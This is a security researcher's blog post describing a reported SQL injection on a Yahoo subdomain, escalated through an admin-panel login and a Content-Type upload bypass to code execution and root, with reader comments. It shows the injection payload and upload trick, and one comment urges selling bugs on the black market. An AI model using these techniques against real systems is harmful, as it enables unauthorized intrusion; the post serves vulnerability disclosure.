Yahoo SQL Injection to Remote Code Exection to Root Privilege.

facebooktwittergoogle_plusredditpinterestlinkedinmail

images

Hello from Egypt :D

Today I will blog about a SQL Injection vulnerability that were escalated to Remote Code Execution, Escalated to Root Privilege on one of Yahoo servers.

The story started while searching in below domain: http://innovationjockeys.yahoo.net/

while intercepting the POST requests, I found below request that graped my attention with the possibility of SQL Injection.

http://innovationjockeys.yahoo.net/tictac_chk_req.php
POST:
f_id=9631

I started some manual checks and it seems a SQL Injection is flying over there!
Shooting it with SQLMap, I got below POC as a confirmation of a Vulnerability!

http://innovationjockeys.yahoo.net/tictac_chk_req.php
POST:
f_id=-9631′ OR (2777=2777)#

Available Databases:
[*] information_schema
[*] innovation******* #Hiding dbnames for Yahoo privacy.
[*] web****

Good, now I’ve a SQL Injection and I can read data as well,

Now, How about finding the admin panel, extracting the administrator Username and Password, login to the administrator panel, trying to find a RCE!

1- Admin panel found on: http://innovationjockeys.yahoo.net/admin/

2- I found the Administrator Password stored in the database and it was encoded as Base64 :D

Screenshot

Good, I’ve decoded the Administrator Password, Logged in to the Admin panel.

Hey Admin Panel! Say Hello to my readers :-)

Screenshot-admin

Now the next step is to find a place to upload files so I can trigger a Remote Code Execution!

That said, I’ve found a upload page, but after uploading a file with “phpinfo();” function as a content,
I found that my uploaded file was named as: page_d03b042780c5071521366edc01e52d3d.xrds+xml

instead of being page_d03b042780c5071521366edc01e52d3d.php ?!

hmmmm, I then tried to intercept the uploading request to find out the problem, and I found below info:

Screenshot from 2014-09-05 05:59:33Yea, now the reason is clear! it’s due to the “Content-Type” Header!

I tried the same request again, but this time I’ve alternatively renamed the “Content-Type” Header to be “application/php” instead, and Here we Go :D

Screenshot-phpinfo

 

Now I’ve triggered the SQLI and the RCE, the last part remains is the Root access on the server,

However, the server kernel were latest updated on 2012! and I had the opportunity to root it with a Local root exploit vulnerability in that non-patched kernel!

Screenshot-root

Time-line:

2014-09-05 Initial report to Yahoo

2014-09-06 Yahoo confirmed the vulnerability

2014-09-07 Yahoo Fixed the Vulnerability

2014-09-19 Yahoo announced me that this vulnerability is not eligible for a reward!!!

Note: I find it very strange that Yahoo did not pay a bounty for such Critical bug even if it fall outside the scope, Yahoo pays for Critical vulnerabilities in Out of Scope domains, if a SQLI to RCE to Root Privilege is not a Critical bug, then what could be?!

 

You can follow me @ Twitter.com/zigoo0

 

This Post was Viewed (43659) times.

11 Comments

  1. Eslam Medhat - September 20, 2014

    They’re so stupid !!!
    But great job keep it up.

  2. Mazen Gamal - September 20, 2014

    Nice Catch Ya Hima ^_^

  3. Fabio - September 20, 2014

    Very great work! this let me think to why partecipate to bug bounty program…W ethical hacker!

  4. Nabil - September 20, 2014

    Congratulations on your discovery, but i wonder isn’t it illegal to probe a website looking for vulnerabilities and even crack their coded password and login to the admin panel ? did you have a written permission from yahoo, if not then how do you do it without being prosecuted ?

  5. Mohammed Gad - September 21, 2014

    Great work !!! bro bs hwa leah daimen el yahoo bysa3bt fe el bug bounty ma3ak !! awl mara tatl3lohom 2 vulnerability w yadook 250$ w daloa2ty waslt l sql w rce w ba3deen 3mlt root w mafesh reward :D !!!!
    ana shayef tab3d 3an el yahoo a7sn low hayfdalo blmanzer dh !

  6. ITsecurity Daily News: 09/22/2014 | ITsecurityITsecurity - September 22, 2014

    […] Yahoo SQL Injection to Remote Code Exection to Root Privilege   Yahoo still hasn’t quite got the hang of this bounty concept. The firm started, just about a year ago, by offering a tee-shirt. Then it announced it would introduce a proper scheme with bounties starting at $150; but in reality reduced it to $50. On Friday, Egyptian researcher Ebrahim Hegazy blogged about a SQLi flaw he had found (and reported) in a Yahoo service. Yahoo declined to offer a bounty, telling Hegazy it wasn’t eligible for a reward. “I find it very strange that Yahoo did not pay a bounty for such Critical bug even if it fall outside the scope, Yahoo pays for Critical vulnerabilities in Out of Scope domains, if a SQLI to RCE to Root Privilege is not a Critical bug, then what could be?!” The danger in such an attitude from Yahoo is that researchers who find such critical bugs might decide to sell them elsewhere. Security Down: http://www.sec-down.com/wordpress/?p=494 […]

  7. S0me0n3 - October 1, 2014

    dude srsly with that experience consider going BlackHat, No one give a f#$ck that’s what i found out, if the bounties aren’t givin’ it ! you could make a fortune.

  8. upload - February 19, 2015

    Thanks for finally talking about >Yahoo SQL Injection to Remote Code Exection to Root Privilege.

    | Security Down! <Liked it!

Leave a reply